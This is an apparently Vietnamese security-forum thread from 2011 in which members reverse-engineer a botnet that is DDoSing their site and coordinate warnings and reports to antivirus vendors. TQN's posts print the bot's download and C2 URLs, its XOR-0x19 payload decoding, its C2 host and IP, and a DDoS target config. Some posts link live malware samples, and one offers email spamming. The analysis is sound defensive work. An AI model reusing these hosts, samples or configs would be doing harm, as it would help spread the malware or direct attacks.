conmale wrote:
acoustics89 wrote:
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi.
nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác

Các anh có ý kiến gì để làm việc hiệu quả hơn không


Anh nghĩ có 3 mảng để lo:

1. RE.
2. Trace net và xác định mạng hoạt động của malware.
3. Report cho các nhóm antiviruses và các nhóm chức năng.

Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã.


em cũng vừa nghĩ đến vấn đề này, thà rằng tạo 1 team âm thầm làm việc và chỉ public khi công việc đến mức độ nào đó. em thấy các anh cứ làm việc rồi lại mất ngồi post lên thế này khá mất thời gian smilie mà lại đánh rắn động cỏ ...nếu được em xin 1 chân ở trong group nào đó smilie
Ý kiến của em là nên lập 1 nhóm tuyên truyền .Hướng dẫn kĩ thuật tìm và diệt malware, cho member ở các forum khác. các phần mềm đã bị fake nên có hướng dẫn cụ thể đâu là thật đâu là giả và lấy từ nguồn nào tốt nhất,chắc chắn chúng ta không thể loại hoàn toàn được malware của STL nhưng cũng đỡ đi phần nào, để chúng nó thấy anh em hva cũng biết cách phản công chứ không chỉ ngồi phân tích cái đống code của chúng. Đã đến lúc mọi người chung tay góp sức, làm việc có kế hoạch và bài bản để đạt được kết quả cao nhất smilie smilie
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam

TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Không sao đâu ga_cum06. Chiến dịch này của stl là chiến dịch thứ 3, thứ 4 rồi, còn chiến dịch của HVA chúng ta là chiến dịch đầu tiên, công khai, đánh thẳng, trực diện vào mặt chúng, phổ biến rộng rãi, công khai.

Tới ngày hôm nay, sau khi đa số host của stl đã bị, được close, tình trạng DDOS của chúng vào HVA đã gần hết, các "mèo đui, mèo què" của chúng bị anh em ta và các AVs chụp gần hết, thì em đã có thể thẳng ngực tuyên bố: chúng ta đã thành công (phần nào đó thôi), đã làm cho tụi stl run sợ, chùng tay, không còn lộng hành công khai như trước nữa, không còn dám coi thường người khác nữa, đã lên tiếng cho cộng đồng Internet VN ta biết về đại dịch stl này, cảnh báo mọi người về sự nguy hiểm của "mèo què", của các phần mềm cờ rắc, download bậy bạ.

Chắc đã đến lúc chúng ta nên phổ biến kỹ thuật RCE, kỹ thuật phòng, chống, loại bỏ virus qua các seminar, các bài viết. Ai biết 1 tham gia 1, ai biết 10 thì tham gia 10.

Sau khi em phổ biến tên các virus của stl lên facebook, các forum, em nhận thấy nhận thức của nhiều người rất kém về virus. Vd: Có cậu cứ la làng: Kis tui là Kis bản quyền, cập nhật thường xuyên, thì làm sao có virus được.

Thậm chí như Avira vừa rồi, update đống BackupSvc lên, còn report cho em như sau:
http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=791390
Clean sạch hết, mà là Trojan.Downloader 100% đấy. Bó tay. Em cạch, không dám tin tưởng 100% vào các AVs nữa.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 21:56:18 (+0700) | #212 | 244337
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Qua vụ này, em càng thêm bớt tin tưởng vào các AVs, mà hiện tại em gỡ KIS rồi, cài CMC Free, sao lại hông có ông nào diệt mấy con e post lên đây hết hở a bolzano_1989 ?

Qua vụ này em cũng càng muốn biết về RCE 1/xxxx công lực của a TQN :-<
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 22:24:10 (+0700) | #213 | 244338
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Nếu công lực "A rờ ci i" của anh nhỏ hơn 1 thì sao lequy ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 22:55:42 (+0700) | #214 | 244339
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
TQN wrote:

Em cạch, không dám tin tưởng 100% vào các AVs nữa.


Em lúc trước mua con lap được khuyến mại bkav pro 3 tháng. Định ko dùng đâu nhưng mà free thì cũng cứ dùng cho đỡ phí(sinh viên mà). Mấy hôm nay nghe thấy vụ này cũng lên down mấy mẫu về xem bkav làm ăn thế nào thế mà nó cũng chén sạch anh ạ smilie . Em nghĩ có khi bkav của anh "quảng bomb" cũng đang "âm thầm" theo chân đám mèo què ấy chứ smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 00:09:59 (+0700) | #215 | 244341
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
TQN wrote:


Thậm chí như Avira vừa rồi, update đống BackupSvc lên, còn report cho em như sau:
http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=791390
Clean sạch hết, mà là Trojan.Downloader 100% đấy. Bó tay. Em cạch, không dám tin tưởng 100% vào các AVs nữa.



Em nhìn cái link của anh mà em buồn cười quá smilie smilie Cười như điên lúc nửa đêm.

Như em nói đó, công nghệ tạo ra malware đang đi trước chúng ta, và các hãng AV. Các hãng cứ quảng cáo mình lắm tài, nhiều công nghệ tiên tiến nhưng mà đấy, submit mẫu cho thì lai bảo clean. Đến cả AV cài trên máy, hook kinh hoàng, driver đủ kiểu, Chữ kí chữ cọt, Emulator, Heuristic, điện toán đám ma... mà có ăn thua đâu Nói chung là lởm như nhau thôi, chả cái AV nào tốt, lại còn chậm máy, thi thoảng lại dở chứng . Nhìn log của các bạn như KIS thì nản, dài dòng, tuỳ chọn vô biên nhưng mà để làm gì, vô dụng cả thôi smilie

Em quen dùng cái av em thích nhất là VMWare, duyệt web vô tư,download thì toàn từ trang chủ, check kĩ, crack thì toàn RCE ra, xem patch thế nào, thì code lại, keygen cũng thế....Nói chung là an toàn tuyệt đối.

Tất nhiên có bác sẽ nói em phải đầu tư RAM với ổ cứng, nhưng mà các bác ạ, dùng AV thì cũng thế thôi, như bạn BIT, sắp lên 1GB database rồi đấy, bạn nào chả chiếm ram, tương đương máy ảo thôi. Trong máy ảo em có cả Microsoft Word nhé smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 00:24:09 (+0700) | #216 | 244342
template
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 02:18:47
Bài gởi: 16
Offline
[Profile] [PM]
Anh TQN rãnh viết Ebook RCE phổ biến cho mọi ngừoi luôn nhé anh smilie

Còn nữa, chưa thấy nhà báo nào tóm lược quá trình vạch mặt bọn STL này cả. Có ai xung phong viết 1 bài ngắn gọn dễ hiểu ko. Khi đó mới Copy vào mấy diễn đàn đc
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 03:49:39 (+0700) | #217 | 244345
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
@acoustics89: trong vài ngàn người thì có 1 người làm được những điều như a.
@TQN: hehe
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 08:21:46 (+0700) | #218 | 244349
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
ptv_vbhp wrote:
TQN wrote:

Em cạch, không dám tin tưởng 100% vào các AVs nữa.


Em lúc trước mua con lap được khuyến mại bkav pro 3 tháng. Định ko dùng đâu nhưng mà free thì cũng cứ dùng cho đỡ phí(sinh viên mà). Mấy hôm nay nghe thấy vụ này cũng lên down mấy mẫu về xem bkav làm ăn thế nào thế mà nó cũng chén sạch anh ạ smilie . Em nghĩ có khi bkav của anh "quảng bomb" cũng đang "âm thầm" theo chân đám mèo què ấy chứ smilie


Trước khi em cho bkav chén mấy con bọ, em có cập nhật virus def của bkav không hay chỉ dùng bản cũ?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 13:24:23 (+0700) | #219 | 244354
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
Bản virus def là gì hả anh ? Em vẫn dùng bản cũ trong đó có mẫu .idx em thấy bị chém lâu lâu rồi hay sao ý ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 14:11:29 (+0700) | #220 | 244359
KMVN
Member
[Minus] 0 [Plus]
Joined: 12/04/2004 17:43:07
Bài gởi: 8
Offline
[Profile] [PM]
ptv_vbhp wrote:
Bản virus def là gì hả anh ? Em vẫn dùng bản cũ trong đó có mẫu .idx em thấy bị chém lâu lâu rồi hay sao ý ?

Definition em, nhưng mà phát biểu thì phải cẩn trọng nhé.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 14:21:22 (+0700) | #221 | 244361
ptv_vbhp
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:16:44
Bài gởi: 11
Offline
[Profile] [PM]
Hic là sao hả anh smilie(
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 14:36:58 (+0700) | #222 | 244363
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Code:
URL1: http://poxxf.com/flash.swf?cpn=ABC
URL2: http://paxds.com/flash.swf?cpn=ABC - Chưa chết, nhưng forbidden.
URL Download AcrobatUpdater.exe: http://poxxf.com/images.gif
User-Agent: Gozilla_2/General


Down images.gif về, xor toàn bộ content với 0x19, ra ông nội bot mới:
Code:
File AcrobatUpdater.exe:
Size = 315392 bytes
MD5 = 5EA82DD32A7ECA5FDDAFE7D4A7F5E82D


Debug, trace, capture packet của nó, ra thông tin thằng host mới của STL:
Code:
Host: second.dinest.net
IP: 193.106.175.68
User-Agent: An0nym0453
xv.jpg: 2011-07-28 09:46:58
xc.jpg: <targets><item enabled="1" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/" keepCookies="1" crawling="1" referer=""/></targets>


Em lạy bà con, bà con xoá giùm em hết mấy cái MsHelpCenter, BackupSvc, AcrobatUpdater giùm em với.
Cảnh báo như vậy mà vẫn không nhúc nhích gì à ?

PS: Chỉ sơ ý bỏ qua một host trong MsHelpCenter.exe mà tụi nó nhanh chân dùng host kia liền. MsHelpCenter.exe, BackupSvc.exe mang trong người nó 2-4 địa chỉ host để download file exe bot về. Host này down không được thì nhảy tới host khác.
Cái này cũng chính là cái chủ quan của em và accxxx89 (thông cảm, tên khó nhớ quá)

File mẫu bot mới up ở: http://www.mediafire.com/?f1xiq71cpfe7ej4
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 14:48:02 (+0700) | #223 | 244364
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Từ 11h tới giờ em ngồi lỳ trên máy, debug hết lại BackupSvc, MsHelpCenter mới và cũ.
Có 2 bản MsHelpCenter.
1. Bản mới: build 27/12/2010
2. Bản cũ: 22/11/2010.

Bản mới mang trong nó các URL sau:
Code:
URL1: http://poxxf.com/flash.swf?cpn=ABC
URL2: http://paxds.com/flash.swf?cpn=ABC
URL Download AcrobatUpdater.exe: http://poxxf.com/images.gif
User-Agent: Gozilla_2/General


Bản cũ:
Code:
URL1: http://tongfeirou.dyndns-web.com/banner1.png?cpn=ABC
URL2: http://biouzhen.dyndns-server.com/banner1.png?cpn=ABC
URL3: http://maowoli.dyndns-free.com/banner1.png?cpn=ABC
User-Agent: Gozilla_2/General


[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 15:03:47 (+0700) | #224 | 244366
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Domain Name: DINEST.NET

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Creation Date: 27-Jul-2011
Expiration Date: 27-Jul-2012


Mới cứng.

Lần này các bạn STL mò về IQHost của Russia Federation smilie.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 15:08:51 (+0700) | #225 | 244367
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Hiện tại CMC đã diệt đươc MsHelpCenter, nhưng BackupSvc thì vẫn chưa.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 15:11:03 (+0700) | #226 | 244368
template
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 02:18:47
Bài gởi: 16
Offline
[Profile] [PM]
TQN wrote:
Em lạy bà con, bà con xoá giùm em hết mấy cái MsHelpCenter, BackupSvc, AcrobatUpdater giùm em với.
Cảnh báo như vậy mà vẫn không nhúc nhích gì à ?


Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 15:19:10 (+0700) | #227 | 244370
latlaobao
Member
[Minus] 0 [Plus]
Joined: 24/06/2011 08:50:43
Bài gởi: 11
Offline
[Profile] [PM]
template wrote:


Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này?

Theo tôi rất nhiều members của HVA theo dõi topic này. Nhưng chỉ riêng HVA thôi thì làm sao khống chế được?
Thiết nghĩ các thành viên HVA nên public các kết quả đến các forum khác thì hiểu quả sẽ cao hơn.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 15:38:26 (+0700) | #228 | 244373
template
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 02:18:47
Bài gởi: 16
Offline
[Profile] [PM]
latlaobao wrote:
template wrote:


Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này?

Theo tôi rất nhiều members của HVA theo dõi topic này. Nhưng chỉ riêng HVA thôi thì làm sao khống chế được?
Thiết nghĩ các thành viên HVA nên public các kết quả đến các forum khác thì hiểu quả sẽ cao hơn.



Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra.

Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 15:50:05 (+0700) | #229 | 244374
ytylk
Member
[Minus] 0 [Plus]
Joined: 27/07/2011 09:35:56
Bài gởi: 1
Offline
[Profile] [PM]
Các anh ở ngoài sáng, còn chúng nó ở trong tối. Thật là bẩn thỉu! Các anh hãy cẩn thận trong cuộc sống và công việc ngoài đời nếu ở VN. Chúng xài luật rừng bẩn thỉu lắm.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 15:52:04 (+0700) | #230 | 244375
latlaobao
Member
[Minus] 0 [Plus]
Joined: 24/06/2011 08:50:43
Bài gởi: 11
Offline
[Profile] [PM]
template wrote:


Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra.

Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn.

Tôi thấy anh TQN đã post các kết quả RCE ở nhiều forum như DDTH, forum về C hay ở vnzoom, nhưng một cánh én khó làm nên mùa xuân. Bởi vậy tôi mới kêu gọi các thành viên có trách nhiệm public nhiều hơn nữa. Có thể qua YM(spam nhưng là spam tốtsmilie) qua các forum mà mình tham gia.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 16:04:28 (+0700) | #231 | 244376
template
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 02:18:47
Bài gởi: 16
Offline
[Profile] [PM]
Ở ĐÂY TÔI KÊU GỌI NHỮNG NGƯỜI CÓ TẦM ẢNH HƯỞNG LỚN NÊN PUBLIC THÔNG TIN NÀY RA. NHẤT LÀ BỌN SINH ZIÊN IT. TỐI NGÀY CỬ LŨI ĐẦU VÀO GAME
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 16:24:00 (+0700) | #232 | 244377
Semperidem
Member
[Minus] 0 [Plus]
Joined: 28/11/2010 08:09:40
Bài gởi: 14
Offline
[Profile] [PM]
Em không dám có ý kiến gì về kĩ thuật. smilie Nhưng xin các anh viết giúp em một cái thông điệp ngắn gọn đầy đủ về phát hiện, diệt mấy cái file này, em không dám viết vì vấn đề kĩ thuật. Tụi em có yahoo, facebook, email, thậm chí có phần mềm tìm email em cũng có thể nhận tìm và spam email thông tin này. smilie có chút công sức mọn xin góp cùng mọi người smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 16:32:19 (+0700) | #233 | 244378
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Sophos trả lời trước tiên (30 phút sau khi gởi):

Thank you for contacting Sophos Technical Support.

**Please note that this is an automated response. If you have any questions, require assistance or clarification on this analysis, please feel free to reply to this email quoting this case number in the subject line.**

The file(s) submitted were malicious in nature and detection will be available on the Sophos Databank shortly.

AcrobatUpdater.exe -- identity created/updated (New detection Troj/ZerBot-A)
jarlib.dll -- clean
AcrobatUpdater.exe -- identity created/updated (New detection Troj/ZerBot-A)
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 17:26:25 (+0700) | #234 | 244379
vndncn
Member
[Minus] 0 [Plus]
Joined: 21/08/2006 10:38:00
Bài gởi: 77
Offline
[Profile] [PM]
latlaobao wrote:
template wrote:


Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra.

Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn.

Tôi thấy anh TQN đã post các kết quả RCE ở nhiều forum như DDTH, forum về C hay ở vnzoom, nhưng một cánh én khó làm nên mùa xuân. Bởi vậy tôi mới kêu gọi các thành viên có trách nhiệm public nhiều hơn nữa. Có thể qua YM(spam nhưng là spam tốtsmilie) qua các forum mà mình tham gia.



Mình có theo dõi topic này từ đầu luôn, đã kiểm tra bảng Unikey cty mình trên VirusToTal thấy có Trojan và Malware, nhưng sao em kiểm tra không cỏ 3 ip tĩnh của cty trong danh sách của chú Conmale. Công ty em không cho download file gì hết. Mấy ngày nay, ở cty cũng như ở nhà, em điều vô topic này theo dõi để có thông tin gì thì gửi spam qua yahoo messenger cũng như gửi mail cho mọi người về những cách mà các chú, các anh đã nêu để mọi người biết tìm cách diệt malware bot này. Chắc phải tóm tắt lại nội dung lại rồi để lên facebook và để status YM! quá.

Có sư huynh nào giúp tóm tắt nội dung dùm để mọi người đồng loạt loan tin với. Cảm ơn.

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 20:05:02 (+0700) | #235 | 244388
[Avatar]
tunghoang
Member
[Minus] 0 [Plus]
Joined: 07/12/2004 06:36:50
Bài gởi: 5
Offline
[Profile] [PM]
Chào mọi người
Tôi có kiểm tra các danh sách IP mà anh comale up thì không thấy có IP của mình trong đó. Nhưng scan thử trên Virustotal file unikey cài trong máy thì được kết quả sau:
http://www.virustotal.com/file-scan/report.html?id=59d4e7d2160a63714a5a9dfe201b7eb4bda81cc13db3c7678e5e58661e1704c8-1311855400
Vậy tôi gửi các bạn file này kèm theo boot log và log autoruns của máy tôi để các bạn phân tích
Unikey + Autoruns: http://www.mediafire.com/myfiles.php#
Boot log: http://www.megaupload.com/?d=KGCFDGBF
Tạm thời tôi không xoá bất cứ file nào trên máy, nếu còn cần thông tin gì thêm tôi sẵn sàng cung câp.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 20:10:02 (+0700) | #236 | 244389
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
File AcrobatUpdater.exe, con bot mới của tụi bán nước stl, được build vào ngày hôm qua: 27/07/2011, lúc 11h. Chắc các anh stl đọc thấy bài post tuyên bố thắng lợi của em nên mấy anh căm lắm phải không ?
À, bây giờ tao build bot mới đã, đăng ký host mới bên Nga ngay, sáng mai, 9h:48phút, mày biết tay tao, tụi HVA và thằng RCE "nữa mùa" TQN, phải mấy anh nghĩ vậy không, mấy anh stl.
Build gấp quá nên code từ User-Agent, hàm giải mã, mấy anh vẫn để nguyên xi.
Em cứ dùng code decode cũ của acourxxx thì giải mã ra file config của mấy anh. Mấy lần rồi, mấy anh set targe chỉ 1 mình HVA, enable = 1 mới chết chứ.
Mấy anh có thấy mấy anh hèn hạ, chơi bẩn lắm không ? Đường đường chính chính đối mặt người ta không được, mấy anh huy động cái đám zombie còn lại của mấy anh chơi ném đá hội đồng HVA à ?
Lần này sinh thread để connect mới dữ chứ, trên 10 thread, mỗi thread 1 port, kinh thế. VB mà cũng biết dùng multithread à ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 20:13:49 (+0700) | #237 | 244391
[Avatar]
tmd
Member
[Minus] 0 [Plus]
Joined: 28/06/2006 03:39:48
Bài gởi: 2951
Offline
[Profile] [PM]
Có danh sách xxx ngàn IP tấn công HVA. Nếu vị HVA's ở ISP nào có lòng, nên huy động nguồn lực để triệt nguồn này tới HVA. Ý kiến cá nhân.
Còn ý kiến công cộng cho các vị viết báo, nên viết một đợt báo nói về mạng BOTNET đang tấn công có chủ đích tới các chủ thể có tiếng tăm.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 20:23:46 (+0700) | #238 | 244393
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tại sao bolzano_1989 phải đăng ký nick mới tunghoang để post bài chứ ? CMC có áp lực cho em à ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 20:38:52 (+0700) | #239 | 244395
[Avatar]
tmd
Member
[Minus] 0 [Plus]
Joined: 28/06/2006 03:39:48
Bài gởi: 2951
Offline
[Profile] [PM]
smilie). Nick đó từ năm 2004 đó bà con TQN.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 20:41:08 (+0700) | #240 | 244396
[Avatar]
tunghoang
Member
[Minus] 0 [Plus]
Joined: 07/12/2004 06:36:50
Bài gởi: 5
Offline
[Profile] [PM]
TQN wrote:
Tại sao bolzano_1989 phải đăng ký nick mới tunghoang để post bài chứ ? CMC có áp lực cho em à ?


http://www.virustotal.com/file-scan/report.html?id=59d4e7d2160a63714a5a9dfe201b7eb4bda81cc13db3c7678e5e58661e1704c8-1311855400
Chắc TQN xem link trên và thấy bolzano_1989 comment phía dưới nên nghĩ như vậy. Tôi là người ngoại đạo, công việc của tôi không liên quan gì đến IT. Tôi và bolzano_1989 là 2 người khác nhau.

crc32
Member
[Minus] 0 [Plus]
Joined: 03/10/2008 21:56:29
Bài gởi: 31
Offline
[Profile] [PM]
"Microsoft đã phối hợp với các doanh nghiệp, trường đại học và chính quyền Mỹ thực hiện chiến
dịch B107 tiêu diệt Rustock, một trong những mạng botnet lớn và nguy hiểm nhất hành tinh."

Hi vọng một mình HVA cũng có thể tiêu diệt mạng botnet lớn nhất Việt Nam hiện nay!
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 20:46:32 (+0700) | #242 | 244398
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
Bây giờ chưa có mẫu mới hả anh, vẫn cái kia nó dos, lại còn post dòng này, bực quá.
Code:
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/hvaonline/posts/list/210/39641.hva#244332" keepCookies="1" crawling="1" referer="Hey Postmodernism, When you config HVA like X-Cafe?"/>


mà tên em dễ viết như thế mà anh TQN lúc thì accxxxx ( chắc đang nghĩ đến từ account )
lúc thì acourxxx smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 21:03:35 (+0700) | #243 | 244399
[Avatar]
tmd
Member
[Minus] 0 [Plus]
Joined: 28/06/2006 03:39:48
Bài gởi: 2951
Offline
[Profile] [PM]
crc32 wrote:
"Microsoft đã phối hợp với các doanh nghiệp, trường đại học và chính quyền Mỹ thực hiện chiến
dịch B107 tiêu diệt Rustock, một trong những mạng botnet lớn và nguy hiểm nhất hành tinh."

Hi vọng một mình HVA cũng có thể tiêu diệt mạng botnet lớn nhất Việt Nam hiện nay!


Muốn làm chiến dịch như vậy thì phải có sự phối hợp giữa "TQN" và "người bị dính chưỡng" và "chính phủ"
1. NGười dính chưỡng cung cấp thông tin lây nhiễm để "TQN" cập nhật thông tin. Yêu cầu tính tự giác .
2. "TQN" viết tool cập nhật liên tục các mẫu.
3. Tiến hành dùng TOOL của "TQN" để quét trên diện rộng hệ thống dính chưỡng.
4. Tiến hành theo dõi diện rộng việc tung chưỡng của sờ tờ lờ. Từ ISP, từ nạn nhân khốn khỗ HVA, từ các nạn nhân có nghi ngờ bị sờ tờ lờ quất khác.
5. Cùng nhau hạ quyền user xuống dưới mức át mi nít chây sần. Và thay đổi tư duy sài account.
6. Liên tục đăng tin khuyến nghị để mọi người biết để tham gia diệt zombies.
...
Ý cùn cá nhân.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 21:05:48 (+0700) | #244 | 244400
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Ủa, nick của em là TQN thì cứ viết là TQN: T = Thằng, Q = Cu, N = Anh, chứ cớ tại sạo cứ kẹp em trong cặp ngoặc kép "" chi vậy ha ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 28/07/2011 21:22:02 (+0700) | #245 | 244403
[Avatar]
mechk
Member
[Minus] 0 [Plus]
Joined: 26/01/2007 18:07:00
Bài gởi: 49
Đến từ: đâu
Offline
[Profile] [PM] [Yahoo!]
Trong bộ font setup của mình có chú vietkey này, đã check trên virustotal, kết quả là dính chấu:
http://www.virustotal.com/file-scan/report.html?id=7d78ed62e1ff3729f33601a177c6fcc4e0d5bd8c0b6369fbf03773a8fac4e596-1311865002

Đây là kết quả phân tích mới nhất. Mình có thử đáp nó vào máy ảo và cả máy thật để kiểm tra lại xem có kết nối nào lạ ko, nhưng đều ko run được (có thể do OS của mình là Win7 64)

Mình cũng ko chắc lắm có phải là virus của stl ko, RCE thì mù tịt smilie, cho vào hex editor thì chỉ đọc được dòng Cannot run in dos mode gì gì đó. Up lên các bác rảnh thì xem qua nhé smilie

http://www.mediafire.com/?o45llc19dat4964
sắp !
[Up] [Print Copy]


